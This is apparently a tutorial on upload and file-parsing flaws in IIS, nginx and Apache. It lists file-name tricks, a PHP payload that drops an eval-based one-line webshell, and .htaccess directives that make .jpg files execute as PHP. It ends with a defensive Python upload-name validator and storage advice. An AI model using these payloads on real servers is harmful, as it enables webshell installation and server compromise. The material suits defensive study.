File parsing vulnerabilities: in some cases IIS, Apache, and nginx interpret certain specially named files as script files.
IIS 5.x & 6.0 vulnerabilities
1. Directory Parsing Vulnerability: /xxx.asp/ma.jpg
- If a folder whose name ends in .asp or .asa is created under the website, any file inside that directory is parsed and executed as an ASP file. If the upload path can be controlled, a shell can be obtained even when the uploaded file is renamed to .jpg.
2. File Parsing Vulnerability: 1.asp;.jpg
- The upload succeeds because the name ends in jpg; at execution time, whatever follows the semicolon is ignored, so the file is executed as ASP (capture and modify the request packet).
Apache Parsing Vulnerability
- Apache parses extensions from right to left; if it does not recognize one, it continues to the next one on the left.
- For example, with 1.php.owf.rar, Apache does not recognize owf or rar, so the file is executed as PHP.
- How to determine whether a suffix is legal: upload a test file such as 1.php.rar.jpg ... (appending the extensions you know) to test which are legal.
IIS 7.0 / 7.5 / nginx <8.03 malformed-path parsing vulnerability
- Upload a file named 1.jpg with the following contents:
<?PHP fputs(fopen('xxx.php','w'),'<?php eval($_POST[a])?>');?>
- Access 1.jpg/.php; a one-line Trojan, xxx.php, will be generated in this directory.
nginx <8.03 null byte code execution vulnerability
- Embed PHP code in the picture
- Execute it by accessing xxx.jpg%00.php
Apache's .htaccess file parsing vulnerability
If testing shows that a .htaccess file can be uploaded and takes effect, then the opportunity has come.
Create 1.txt, write the following code into it, then choose Save As and set Save as type to All Files:
AddType application/x-httpd-php .jpg
or
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
The meaning of the code in the .htaccess file is that uploaded files with the .jpg suffix are parsed as PHP.
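From the defender's side, every naming trick listed on this page can be refused before an upload reaches the web root. The following check is an added example, not code from the original page; the function name check_upload_path and the image-only extension policy are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumed policy for this sketch: an image-only upload endpoint.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Folder suffixes that IIS 5.x/6.0 treats as script directories (per the page).
SCRIPT_DIR_SUFFIXES = (".asp", ".asa")


def check_upload_path(raw_path):
    """Return the reasons to reject raw_path; an empty list means accept."""
    reasons = []
    # Decode repeatedly so a double-encoded %2500 still surfaces as NUL.
    path = raw_path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    if "\x00" in path:
        reasons.append("null byte in path")            # xxx.jpg%00.php
    *dirs, name = path.split("/")
    for d in dirs:
        if d.lower().endswith(SCRIPT_DIR_SUFFIXES):
            reasons.append("script-named directory: " + d)  # /xxx.asp/ma.jpg
    if ";" in name:
        reasons.append("semicolon in file name")       # 1.asp;.jpg
    if name.lower().startswith(".ht"):
        reasons.append("Apache per-directory config file")  # .htaccess
    parts = name.split(".")
    if not re.fullmatch(r"[A-Za-z0-9_-]+", parts[0]):
        reasons.append("unsafe base name")             # 1.jpg/.php
    if len(parts) != 2:
        reasons.append("exactly one extension required")  # 1.php.owf.rar
    elif parts[1].lower() not in ALLOWED_EXTENSIONS:
        reasons.append("extension not allowed: " + parts[1])
    return reasons


if __name__ == "__main__":
    # Constructed sample names, taken from the patterns named on this page.
    for sample in ["uploads/photo.jpg", "xxx.asp/ma.jpg", "1.asp;.jpg",
                   "1.php.owf.rar", "1.jpg/.php", "xxx.jpg%00.php", ".htaccess"]:
        print(sample, "->", check_upload_path(sample) or "accepted")
```

Storing uploads under a server-generated name, in a directory where no script handler is mapped and .htaccess overrides are disabled, removes the dependence on name filtering alone.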